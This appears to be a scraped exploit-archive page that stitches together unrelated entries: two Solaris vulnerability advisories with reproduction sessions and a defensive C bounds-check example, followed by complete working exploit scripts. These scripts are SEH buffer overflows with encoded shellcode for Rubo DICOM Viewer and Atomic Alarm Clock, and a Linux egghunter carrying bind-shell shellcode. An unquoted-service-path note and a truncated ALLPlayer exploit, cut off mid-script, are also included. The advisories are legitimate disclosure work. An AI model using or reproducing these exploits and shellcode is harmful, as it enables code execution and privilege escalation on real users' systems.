CVE Name: CVE-2020-2851
CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 7.8)
References: https://github.com/0xdea/advisories/blob/master/2020-06-cde-libDtSvc.txt
https://www.oracle.com/security-alerts/cpuapr2020.html
https://sourceforge.net/p/cdesktopenv/wiki/Home/
https://www.oracle.com/technetwork/server-storage/solaris10/
https://www.mediaservice.net/
https://0xdeadbeef.info/

1. Abstract.

A difficult to exploit stack-based buffer overflow in the _DtCreateDtDirs()
function in the Common Desktop Environment version distributed with Oracle
Solaris 10 1/13 (Update 11) and earlier may allow local users to corrupt memory
and potentially execute arbitrary code in order to escalate privileges via a
long X11 display name. The vulnerable function is located in the libDtSvc
library and can be reached by executing the setuid program dtsession.

Note that Oracle Solaris CDE is based on the original CDE 1.x train, which is
different from the CDE 2.x codebase that was later open sourced. In detail, the
open source CDE is not affected by this specific vulnerability, but following
our report some additional work has been done by its maintainers to properly
check bounds in the libDtSvc library. Most notably, insecure calls to strncat()
that caused buffer overflows have been fixed.

2. Example Attack Session.

In order to reproduce this bug, the following commands can be used:

bash-3.2$ cat /etc/release
Oracle Solaris 10 1/13 s10x_u11wos_24a X86
Copyright (c) 1983, 2013, Oracle and/or its affiliates. All rights reserved.
Assembled 17 January 2013
bash-3.2$ uname -a
SunOS nostalgia 5.10 Generic_147148-26 i86pc i386 i86pc
bash-3.2$ id
uid=54322(raptor) gid=1(other)
bash-3.2$ grep 10.0.0.24 /etc/hosts
10.0.0.24 aaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[activate a valid display on 10.0.0.24:0]
/usr/dt/bin/dtsession -display aaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:0
Segmentation Fault

3. Discussion.

The overflow occurs in the following code snippet of Oracle Solaris CDE (the
Ghidra decompiler is probably doing something wrong as some variables seem to
overlap, however its output is good enough for the purpose of this discussion):

char * _DtCreateDtDirs(int param_1)
{
    ...
    char local_f0 [104];
    char local_88 [112];
    char *heap_path2;
    char *tmp_ptr1;
    char *home;
    undefined *local_c;
    undefined local_8 [4];
    ...
    if (param_1 != 0) {
        strcpy(local_f0,*(char **)(param_1 + 0x80));
        strcpy(local_88,*(char **)(param_1 + 0x80));
        ...
}

An X11 display data structure is passed to the _DtCreateDtDirs() function as
its only parameter (param_1 in the pseudocode above). It contains the X11
display name at offset 0x80. This display name is copied into the stack buffers
local_f0 and local_88 using the insecure function strcpy() twice, therefore two
overflows occur.

Based on the inferred stack layout, the following local variables are
overflowed into before the saved return address can be reached:

heap_path2
tmp_ptr1
home
local_c
local_8

This complicates exploitation, in particular because the heap_path2 and
tmp_ptr1 pointers get in the way. A skilled attacker might be able to overwrite
all variables with safe data and leverage memory corruption to obtain arbitrary
code execution. However, there is an additional challenge: the ability to
control a hostname to be passed in the X11 display name string. In our PoC
above we have edited /etc/hosts, but this is obviously not possible for an
unprivileged local attacker. A DNS server under the control of the attacker may
be used for this purpose, but such an approach would introduce a number of
additional complications.

That said, as a rule of thumb all memory corruption issues have the potential
to become serious security vulnerabilities until otherwise proven. Therefore,
we recommend treating this bug as a potential security vulnerability and
fixing it as such.

4. Affected Platforms.

All platforms shipping the Common Desktop Environment are potentially affected.
This includes:

* Oracle Solaris 10 1/13 (Update 11) and earlier [default installation]

According to the CDE Wiki, the following platforms are officially supported:

* All Official Ubuntu variants 12.04 - 18.04
* Debian 6, 7, 8, 9
* Fedora 17 at least
* Archlinux
* Red Hat
* Slackware 14.0
* OpenBSD
* NetBSD
* FreeBSD 9.2, 10.x, 11.x
* openSUSE Tumbleweed (gcc7)
* openSUSE Leap 4.2 (gcc4)
* SUSE 12 SP3 (gcc4)
* Solaris, OpenIndiana

5. Fix.

The maintainers of the open source CDE 2.x version have issued the following
patches:
https://sourceforge.net/p/cdesktopenv/mailman/message/36900154/
https://sourceforge.net/p/cdesktopenv/code/ci/6b32246d06ab16fd7897dc344db69d0957f3ae08/

Oracle, which maintains a different CDE codebase based on the 1.x train, has
assigned the tracking# S1240932 and has released a fix for all affected and
supported versions of Solaris in the Critical Patch Update (CPU) of April 2020.

As a workaround, it is also possible to remove the setuid bit from the
vulnerable executable as follows (note that this might prevent it from working
properly):

bash-3.2# chmod -s /usr/dt/bin/dtsession

Please note that during the audit many other potentially exploitable bugs have
surfaced in libDtSvc and in the Common Desktop Environment in general.
Therefore, removing the setuid bit from all CDE binaries is recommended,
regardless of patches released by vendors.

Copyright (c) 2020 Marco Ivaldi and @Mediaservice.net. All rights reserved.

Oracle Solaris 11.x / 10 whodo / w Buffer Overflow


A difficult to exploit heap-based buffer overflow in setuid root whodo and w binaries distributed with Solaris allows local users to corrupt memory and potentially execute arbitrary code in order to escalate privileges.


MD5 | 126e62d56e5dfaefeb640c1b3525eab4

@Mediaservice.net Security Advisory #2020-07 (last updated on 2020-04-15)

Title:          Heap-based buffer overflow in Solaris whodo and w commands
Application:    Setuid root whodo and w binaries distributed with Solaris
Platforms:      Oracle Solaris 11.x (confirmed on 11.4 X86)
                Oracle Solaris 10 (confirmed on 10 1/13 X86)
                Other platforms are potentially affected (see below)
Description:    A difficult to exploit heap-based buffer overflow in setuid
                root whodo and w binaries distributed with Solaris allows
                local users to corrupt memory and potentially execute arbitrary
                code in order to escalate privileges
Author:         Marco Ivaldi <marco.ivaldi@mediaservice.net>
Vendor Status:  <secalert_us@oracle.com> notified on 2019-08-23
CVE Name:       CVE-2020-2771
CVSS Vector:    CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N (Base Score: 2.5)
References:     https://github.com/0xdea/advisories/blob/master/2020-07-solaris-whodo-w.txt
                https://www.oracle.com/security-alerts/cpuapr2020.html
                https://www.oracle.com/technetwork/server-storage/solaris11/
                https://github.com/illumos/illumos-gate/blob/61aaa916808c601f9ee36d96c05ee9dac211d09e/usr/src/cmd/whodo/whodo.c
                https://github.com/illumos/illumos-gate/blob/61aaa916808c601f9ee36d96c05ee9dac211d09e/usr/src/cmd/w/w.c
                https://www.mediaservice.net/
                https://0xdeadbeef.info/

1. Abstract.

A difficult to exploit heap-based buffer overflow in setuid root whodo and w
binaries distributed with Solaris allows local users to corrupt memory and
potentially execute arbitrary code in order to escalate privileges.

2. Example Attack Session.

In order to reproduce this bug, the following commands can be used:

raptor@stalker:~$ cat /etc/release
Oracle Solaris 11.4 X86
Copyright (c) 1983, 2018, Oracle and/or its affiliates. All rights reserved.
Assembled 16 August 2018
raptor@stalker:~$ uname -a
SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
raptor@stalker:~$ id
uid=100(raptor) gid=10(staff)
raptor@stalker:~$ cp /usr/bin/sleep AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
raptor@stalker:~$ exec -a '- BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB' ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 256 &
[switch to another shell]
raptor@stalker:~$ whodo -l # or w
12:43pm up 5 day(s), 20 hr(s), 36 min(s) 5 user(s)
User tty login@ idle JCPU PCPU what
raptor vt/7 Tue 2pm 6days 1:49 1:49 /usr/lib/tracker-miner-apps
Segmentation Fault

3. Discussion.

A detailed analysis of the buffer overflow in whodo follows. The w binary is
also affected by this bug, because the two programs share a large portion of
their codebase. Therefore, similar considerations apply to w.

The overflow happens as follows (the Illumos source code available on GitHub
has been used as a reference for this analysis, even though it doesn't exactly
match the code of the binaries shipped with commercial Solaris versions):

* The psinfo structure info is populated by reading /proc/<pid>/psinfo
* The char array info.pr_fname[16] is copied into the char array
  up->p_comm[80+1]
* As a side note, the call to strncpy() at lines 344-345 incorrectly uses the
  size of the source buffer instead of the size of the destination buffer, but
  in this case this programming mistake doesn't cause a problem, because the
  source buffer is always smaller than the destination buffer:
      (void) strncpy(up->p_comm, info.pr_fname,
          sizeof (info.pr_fname));
* The char array up->p_args[80+1] is then populated at line 418 based on the
  char array info.pr_psargs[80] as follows:
      (void) strcpy(up->p_args, info.pr_psargs);
* If up->p_args begins with "?" or "- " (or, more correctly, with "-" followed
  by any byte <= 0x20), the following code branch at lines 423-425 is taken:
      (void) strcat(up->p_args, " (");
      (void) strcat(up->p_args, up->p_comm);
      (void) strcat(up->p_args, ")");
* In detail, the following chars are appended to the string:
      " (" + up->p_comm [maximum size excluding NULL-terminator is 15] + ")" + NULL
* Therefore, it is possible to overflow the up->p_args buffer at most as
  follows:
  * Buffer is 81 bytes: "- " + "B"x77 + " ("
  * Overflow is 17 bytes: "A"x15 + ")" + NULL

The uproc structure is declared at lines 106-119:
    struct uproc {
        pid_t   p_upid;             /* user process id */
        char    p_state;            /* numeric value of process state */
        dev_t   p_ttyd;             /* controlling tty of process */
        time_t  p_time;             /* ticks of user & system time */
        time_t  p_ctime;            /* ticks of child user & system time */
        int     p_igintr;           /* 1=ignores SIGQUIT and SIGINT */
        char    p_comm[PRARGSZ+1];  /* command */
        char    p_args[PRARGSZ+1];  /* command line arguments */
        struct uproc *p_child,      /* first child pointer */
                     *p_sibling,    /* sibling pointer */
                     *p_pgrplink,   /* pgrp link */
                     *p_link;       /* hash table chain pointer */
    };

A 17-byte overflow past the p_args buffer is not large enough to reach
critical control structures and directly take control of the program flow.
However, we are able to overflow into the p_child and p_sibling members of the
uproc structure up, assuming 64-bit addressing. With 32-bit addressing we
should be able to corrupt additional pointers, i.e. p_pgrplink and p_link.
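The arithmetic behind the "81 bytes buffer, 17 bytes overflow" figures above, and the bounded form the strcpy()/strcat() sequence should have had, as an added example that is not part of the advisory or of the Illumos whodo.c (the same bounded-copy pattern applies to the strcpy() calls in _DtCreateDtDirs() from the libDtSvc advisory above). PRARGSZ (80) and the 16-byte pr_fname follow the psinfo sizes quoted in the analysis; bounded_len(), args_bytes_written() and build_args_safe() are hypothetical helper names.

```c
#include <stdio.h>
#include <string.h>

#define PRARGSZ  80             /* sizeof info.pr_psargs */
#define PRFNSZ   16             /* sizeof info.pr_fname  */
#define P_ARGSSZ (PRARGSZ + 1)  /* sizeof up->p_args     */

/* strnlen() equivalent, kept local so the example needs only ISO C. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* The branch at lines 423-425 of whodo.c: p_args starts with "?" or with
 * "-" followed by any byte <= 0x20. */
static int takes_comm_branch(const char *args)
{
    return args[0] == '?' ||
           (args[0] == '-' && (unsigned char)args[1] <= 0x20);
}

/* Bytes the original strcpy()/strcat() sequence stores into p_args, NUL
 * included: psargs, then " (" + comm + ")" when the branch is taken. */
size_t args_bytes_written(const char *psargs, const char *comm)
{
    size_t n = bounded_len(psargs, PRARGSZ) + 1;
    if (takes_comm_branch(psargs))
        n += 2 + bounded_len(comm, PRFNSZ) + 1;
    return n;
}

/* Hardened form: build the same string only when it fits in dst.
 * Returns 0 on success, -1 where the original code would have overrun. */
int build_args_safe(char *dst, size_t dstsz,
                    const char *psargs, const char *comm)
{
    if (dstsz == 0 || args_bytes_written(psargs, comm) > dstsz) {
        if (dstsz)
            dst[0] = '\0';
        return -1;
    }
    if (takes_comm_branch(psargs))
        snprintf(dst, dstsz, "%.*s (%.*s)", PRARGSZ, psargs, PRFNSZ, comm);
    else
        snprintf(dst, dstsz, "%.*s", PRARGSZ, psargs);
    return 0;
}

/* Constructed worst case from the advisory: pr_psargs = "- " + 77 x 'B'
 * (79 chars + NUL, filling the 80-byte field) and a 15-char pr_fname. */
static void fill_worst_case(char *psargs, char *comm)
{
    memset(psargs, 'B', PRARGSZ);
    psargs[0] = '-';
    psargs[1] = ' ';
    psargs[PRARGSZ - 1] = '\0';
    memset(comm, 'A', PRFNSZ);
    comm[PRFNSZ - 1] = '\0';
}

/* Bytes the original code writes past the end of the 81-byte p_args. */
size_t worst_case_overrun(void)
{
    char psargs[PRARGSZ], comm[PRFNSZ];
    size_t n;
    fill_worst_case(psargs, comm);
    n = args_bytes_written(psargs, comm);
    return n > P_ARGSSZ ? n - P_ARGSSZ : 0;
}

/* 1 if the hardened builder refuses the worst case, 0 if it accepted it. */
int worst_case_is_rejected(void)
{
    char psargs[PRARGSZ], comm[PRFNSZ], dst[P_ARGSSZ];
    fill_worst_case(psargs, comm);
    return build_args_safe(dst, sizeof dst, psargs, comm) == -1;
}

/* 1 if an ordinary (constructed) entry still formats as whodo prints it. */
int benign_case_ok(void)
{
    char dst[P_ARGSSZ];
    if (build_args_safe(dst, sizeof dst, "- sleep 256", "sleep") != 0)
        return 0;
    return strcmp(dst, "- sleep 256 (sleep)") == 0;
}

int main(void)
{
    printf("worst-case overrun past p_args: %lu bytes\n",
           (unsigned long)worst_case_overrun());   /* 17 */
    printf("hardened builder rejects it: %s\n",
           worst_case_is_rejected() ? "yes" : "no");
    printf("benign entry formats correctly: %s\n",
           benign_case_ok() ? "yes" : "no");
    return 0;
}
```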

A skilled attacker might be able to leverage the corruption of these pointers
to obtain arbitrary code execution. However, he or she would face a number of
additional challenges:

* The target program uses privilege bracketing with the PRIV_PROC_OWNER
privilege. This privilege allows a process to send signals to other
processes, inspect, and potentially modify (with some additional
restrictions) the process state in other processes, regardless of ownership.
Therefore, it's theoretically possible to write a shellcode that activates
the privilege and dumps the memory of a privileged process (e.g. "passwd")
via /proc/<pid>/mem, without ever executing an actual shell. However, this
must be done before privileges are relinquished at line 455. This leaves
only a limited amount of code paths to leverage our corrupted structure
(namely, the main loop through /proc starting at line 315 and ending at line
452).
* The char array info.pr_psargs[80] is cleaned up by the clnarglist() function
at line 417: non-printable ASCII chars (c < 0x20 and c > 0x7e) get replaced
with a "?" and must therefore be considered badchars. Luckily this
restriction does not apply to the part of the buffer that causes the actual
overflow, but only bytes that are valid in file names can be used in our
malicious buffer.
* The ")" + NULL chars at the end of the evil buffer might cause unforeseen
problems during exploitation.
* Additional security measures such as Address Space Layout Randomization
(ASLR) might get in the way of reliable exploitation.

Based on this analysis, our conclusion is that this bug is not exploitable on
Solaris 11.x and 10 in order to escalate privileges. That said, as a rule of
thumb all memory corruption issues have the potential to become serious
security vulnerabilities until otherwise proven. For instance, it might very
well be possible to exploit this bug on systems that don't implement privilege
bracketing, such as Solaris 9 and earlier. Therefore, we recommend treating
this bug as a potential security vulnerability and fixing it as such.

4. Affected Platforms.

This bug was confirmed on the following platforms:

* Oracle Solaris 11.x (confirmed on 11.4 X86)
* Oracle Solaris 10 (confirmed on 10 1/13 X86)

Other Oracle Solaris versions (including those that run on the SPARC
architecture) and Illumos distributions are also likely affected.

5. Fix.

Oracle has assigned the tracking# S1199548 and has released a fix for all
affected and supported versions of Solaris in the Critical Patch Update (CPU)
of April 2020.

As a temporary workaround, it is possible to remove the setuid bit from whodo
and w executables as follows (note that this might prevent them from working
properly):

bash-3.2# chmod -s /usr/sbin/whodo /usr/bin/w

Copyright (c) 2020 Marco Ivaldi and @Mediaservice.net. All rights reserved.

Atomic Alarm Clock 6.3 Unquoted Service Path


Atomic Alarm Clock version 6.3 suffers from an unquoted service path vulnerability.


MD5 | 9772a437661ceaa5d2a847108d660eac

#Exploit Title: Atomic Alarm Clock (x86) - Local Privilege Escalation
#Exploit Author: Bobby Cooke
#Date: 04/17/2020
#Vendor Homepage: http://www.drive-software.com
#Software Link: http://www.drive-software.com/download/ataclock.exe
#Version: 6.3
#Tested On: Windows 10 Pro 1909 (32-bit)
#Vulnerability Type:
Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
#Vulnerability Description:
The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. This security misconfiguration by the vendor can be exploited locally or as part of an attack chain. By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution. Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.

C:\Users\boku>sc qc AtomicAlarmClock
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AtomicAlarmClock
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Atomic Alarm Clock Time
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Rubo DICOM Viewer 2.0 Buffer Overflow


Rubo DICOM Viewer version 2.0 SEH buffer overflow exploit.


MD5 | 725fb4ec16efa64dcdaea6f2ad4a00ef

# Exploit Title: Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Date: 2020-04-17
# Vulnerable Software: Rubo Medical Imaging - DICOM Viewer 2.0
# Vendor Homepage: http://www.rubomedical.com/
# Version: 2.0
# Software Link : http://www.rubomedical.com/download/index.php
# Tested Windows 7 SP1 x86
#
#
# PoC
# 1. generate overview.txt, copy contents to clipboard
# 2. open application
# 3. select send dicom files, edit
# 4. paste contents from clipBoard to "DICOM server name" field
# 6. pop calc

#!/usr/bin/python

import struct

junk1 = "A"*1868

#0x00402f0e : pop ecx # pop ebp # ret 0x04[Overview.exe]
seh = struct.pack('<L',0x00402f0e)

jmp1 = "\xeb\xf8\xcc\xcc"

jmp2 = "\xe9\x11\xFF\xFF\xFF\x90"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0d" -f c
#Payload size: 220 bytes
calc = ("\xd9\xc3\xba\x3a\xf3\xa8\x97\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x31\x31\x53\x18\x03\x53\x18\x83\xc3\x3e\x11\x5d\x6b\xd6\x57"
"\x9e\x94\x26\x38\x16\x71\x17\x78\x4c\xf1\x07\x48\x06\x57\xab"
"\x23\x4a\x4c\x38\x41\x43\x63\x89\xec\xb5\x4a\x0a\x5c\x85\xcd"
"\x88\x9f\xda\x2d\xb1\x6f\x2f\x2f\xf6\x92\xc2\x7d\xaf\xd9\x71"
"\x92\xc4\x94\x49\x19\x96\x39\xca\xfe\x6e\x3b\xfb\x50\xe5\x62"
"\xdb\x53\x2a\x1f\x52\x4c\x2f\x1a\x2c\xe7\x9b\xd0\xaf\x21\xd2"
"\x19\x03\x0c\xdb\xeb\x5d\x48\xdb\x13\x28\xa0\x18\xa9\x2b\x77"
"\x63\x75\xb9\x6c\xc3\xfe\x19\x49\xf2\xd3\xfc\x1a\xf8\x98\x8b"
"\x45\x1c\x1e\x5f\xfe\x18\xab\x5e\xd1\xa9\xef\x44\xf5\xf2\xb4"
"\xe5\xac\x5e\x1a\x19\xae\x01\xc3\xbf\xa4\xaf\x10\xb2\xe6\xa5"
"\xe7\x40\x9d\x8b\xe8\x5a\x9e\xbb\x80\x6b\x15\x54\xd6\x73\xfc"
"\x11\x28\x3e\x5d\x33\xa1\xe7\x37\x06\xac\x17\xe2\x44\xc9\x9b"
"\x07\x34\x2e\x83\x6d\x31\x6a\x03\x9d\x4b\xe3\xe6\xa1\xf8\x04"
"\x23\xc2\x9f\x96\xaf\x2b\x3a\x1f\x55\x34")

junk2 = "\x90"*14

buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh

with open("overview.txt","wb") as f:
    f.write(buffer[:-1])

Atomic Alarm Clock 6.3 Stack Overflow


Atomic Alarm Clock version 6.3 unicode SEH stack overflow exploit.


MD5 | 8acffd0868c53a830a8a31f9181a0f30

# Exploit Title: Atomic Alarm Clock 6.3 - Venetian Blinds Zipper - Unicode SEH Stack Overflow
# Exploit Author: Bobby Cooke
# Date: April 17th, 2020
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/ataclock.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Atomic Alarm Clock 6.3 beta
# Recreate: Install > Open > Run Exploit > Open poc.txt & copy to clipboard > Time Zones > Clock1 > click 'Enter display name' textbox > paste buffer

File = 'poc.txt'

os_nSEH = '\x41'*(461)
nSEH = '\xeb\x05' # jmp short +2
SEH = '\x47\x47' # 0x00470047 : pop esi # pop ebx # ret [AtomicAlarmClock.exe]
#{PAGE_EXECUTE_READ} ASLR: False, Rebase: False, SafeSEH: False

getPC = '\x73' # add [ebx], dh # nop | [EBX] = writable memory
getPC += '\x61' # popad # [ESP] = &Payload
getPC += '\x72' # add [edx], dh # realigns execution for 1 byte opcodes

ebx2eax = '\x58' # pop eax # EAX = &Payload
ebx2eax += '\x72' # add [edx], dh

# Adjust EAX to &Decoder
getDecoder = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += '\x72' # add [edx], dh
getDecoder += '\x50' # push eax # [ESP] = &Decoder
getDecoder += '\x72' # add [edx], dh

#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
## 2nd byte - \x00 => \x5F
venBlinds = '\x40\x72\xC6\x5F\x72\x40\x72\x40\x72'
## 4th byte - \x00 => \x33
venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
## 6th byte - \x00 => \x33
venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
## 8th byte - \x00 => \x66
venBlinds += '\xC6\x66\x72\x40\x72\x40\x72'
## 10th byte - \x00 => \x10
venBlinds += '\xC6\x10\x72\x40\x72\x40\x72'
## 12th byte - \x00 => \x33
venBlinds += '\xC6\x33\x72\x40\x72\x40\x72'
## 14th byte - \x00 => \x42
venBlinds += '\xC6\x42\x72\x40\x72\x40\x72'
## 16th byte - \x00 => \x32
venBlinds += '\xC6\x32\x72\x40\x72\x40\x72'
## 18th byte - \x00 => \x02
venBlinds += '\xC6\x02\x72\x40\x72\x40\x72'
## 20th byte - \x00 => \x10
venBlinds += '\xC6\x10\x72\x40\x72\x40\x72'
## 22nd byte - \x00 => \x3F
venBlinds += '\xC6\x3F\x72\x40\x72\x40\x72'
## 24th byte - \x00 => \x1F
venBlinds += '\xC6\x1F\x72\x40\x72\x40\x72'
## 26th byte - \x00 => \x49
venBlinds += '\xC6\x49\x72\x40\x72\x40\x72'
## 28th byte - \x00 => \x02
venBlinds += '\xC6\x02\x72\x40\x72\x40\x72'
## 30th byte - \x00 => \xED
venBlinds += '\xC6\xED\x72\x40\x72\x40\x72'
## 32nd byte - \x00 => \xC3
venBlinds += '\xC6\xC3\x72\x40\x72'
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds += '\xC3' # ret [!] Now we are executing the decoder!

os_decoder = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))

# Custom PopCalc shellcode that avoids the bad characters
fKernel32 = '\x33\xF6\xF7\xE6\x64\x03\x52\x30\x03\x42\x0C\x03\x70\x1C\xAD\x50\x5E\xAD\xFF\x70\x08'

gExpotTbl = '\x33\xC9\x33\xF6\x33\xDB\xF7\xE3\x58\x50\x03\x70\x3C\x03\xF0\x03\x56\x78\x03\xD0\x03\x5A\x20\x03\xD8\x03\x4A\x24\x03\xC8\x51\x33\xFF\x03\x7A\x1C\x03\xF8\x57'

fWinExec = '\x68\x57\x69\x6E\x45\x33\xC0\x33\xF6\x03\xF4\xFC\x50\x33\xC9\x41\x41\x41\x41\xF7\xE1\x33\xFF\x03\x3C\x18\x58\x03\x7C\x24\x0C\xF3\xA6\x74\x03\x40\xEB\xE1\x33\xC9\x41\x41\xF7\xE1\x33\xC9\x03\x4C\x24\x08\x03\xC8\x33\xC0\x66\x03\x01\x33\xC9\x41\x41\x41\x41\xF7\xE1\xFF\x74\x24\x04\x01\x04\x24\x5A\x33\xDB\x03\x1A\x03\x5C\x24\x0C'

# Call WinExec( CmdLine, ShowState );
# CmdLine = "calc.exe"
# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec = '\x33\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x33\xC0\x03\xC4\x41\x51\x50\xFF\xD3'

shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec

buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler = '\x77'*(9000-len(buffer))
buffer = buffer+filler

try:
    payload = buffer
    f = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'


Linux/x86 Egghunter / Null-Free Shellcode


33 bytes small Linux/x86 egghunter null-free shellcode.


MD5 | f143c7106d8f990b5f7946ceed5264ed

/*
# Title: Linux/x86 - EggHunter + Null-Free Shellcode (33 Bytes)
# Author: Shubham Singh
# Tested on: x86 GNU/Linux
# Shellcode Length: 33 Bytes
#Student ID: SLAE - 1342

#Description: Null-Free Egg Hunter Shellcode - 33 Bytes
#file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
8048060: eb 05 jmp 8048067 <next_addr>

08048062 <page_allignment>:
8048062: 66 81 c9 ff 0f or $0xfff,%cx

08048067 <next_addr>:
8048067: 31 c0 xor %eax,%eax
8048069: 41 inc %ecx
804806a: b0 43 mov $0x43,%al
804806c: cd 80 int $0x80

0804806e <check_if_efault>:
804806e: 3c f2 cmp $0xf2,%al
8048070: 74 f0 je 8048062 <page_allignment>

08048072 <check_if_egg>:
8048072: b8 ef be ad de mov $0xdeadbeef,%eax
8048077: 89 cf mov %ecx,%edi
8048079: af scas %es:(%edi),%eax
804807a: 75 eb jne 8048067 <next_addr>
804807c: af scas %es:(%edi),%eax
804807d: 75 e8 jne 8048067 <next_addr>
804807f: ff e7 jmp *%edi

POC:
1. ➜ gcc -fno-stack-protector -z execstack shellcode1.c -o shellcode1
2. ➜ ./shellcode1
Length of Egg Hunter Shellcode: 33
Shellcode length: 102

3. Open new terminal and type
➜ nc 127.0.0.1 1337
ls
bind_shell
bind_shell.nasm
bind_shell.o
egghunter_shellcode
egghunter_shellcode.nasm
egghunter_shellcode.o


*/
#include<stdio.h>
#include<string.h>
#define EGG "\xef\xbe\xad\xde"
unsigned char egg_search[] = \
"\xeb\x05\x66\x81\xc9\xff\x0f\x31\xc0\x41\xb0\x43\xcd\x80\x3c\xf2\x74\xf0\xb8\xef\xbe\xad\xde\x89\xcf\xaf\x75\xeb\xaf\x75\xe8\xff\xe7";
unsigned char code[]= \
EGG
EGG
"\x31\xc0\x31\xdb\x99\xb0\x66\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x31\xc0\xb0\x66\x43\x52\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\x49\xb0\x3f\xcd\x80\x79\xf9\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
int main(void)
{
    printf("Length of Egg Hunter Shellcode: %d\n", (int)strlen((char *)egg_search));
    printf("Shellcode length: %d\n", (int)strlen((char *)code));
    int (*ret)() = (int (*)())egg_search;
    ret();
    return 0;
}


ALLPlayer 7.6 Buffer Overflow


ALLPlayer version 7.6 unicode SEH local buffer overflow exploit.


MD5 | d4dd6ec9d182e4cc7cce633147a8a316



# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)
# Version: 7.6
# Date: 20-04-2020
# Exploit Author: Xenofon Vassilakopoulos
# Tested on: Windows 7 Home Premium SP1 x86

# Steps to reproduce :
# 1. generate the test.m3u using this exploit
# 2. open ALLPlayer then go to Open audio file
# 3. load the test.m3u file
# 4. calc

filename = "test.m3u"

junk="A"*301

nseh = "\x61\x6e" # popad align
seh = "\x12\x74" # pop ebx # pop ebp # ret 0x04


align=("\x56" # push esi
"\x6e" # venetian shellcode
"\x58" # pop eax
"\x6e" # venetian shellcode
"\x05\x19\x11" # add eax,0x11001900
"\x6e" # venetian shellcode
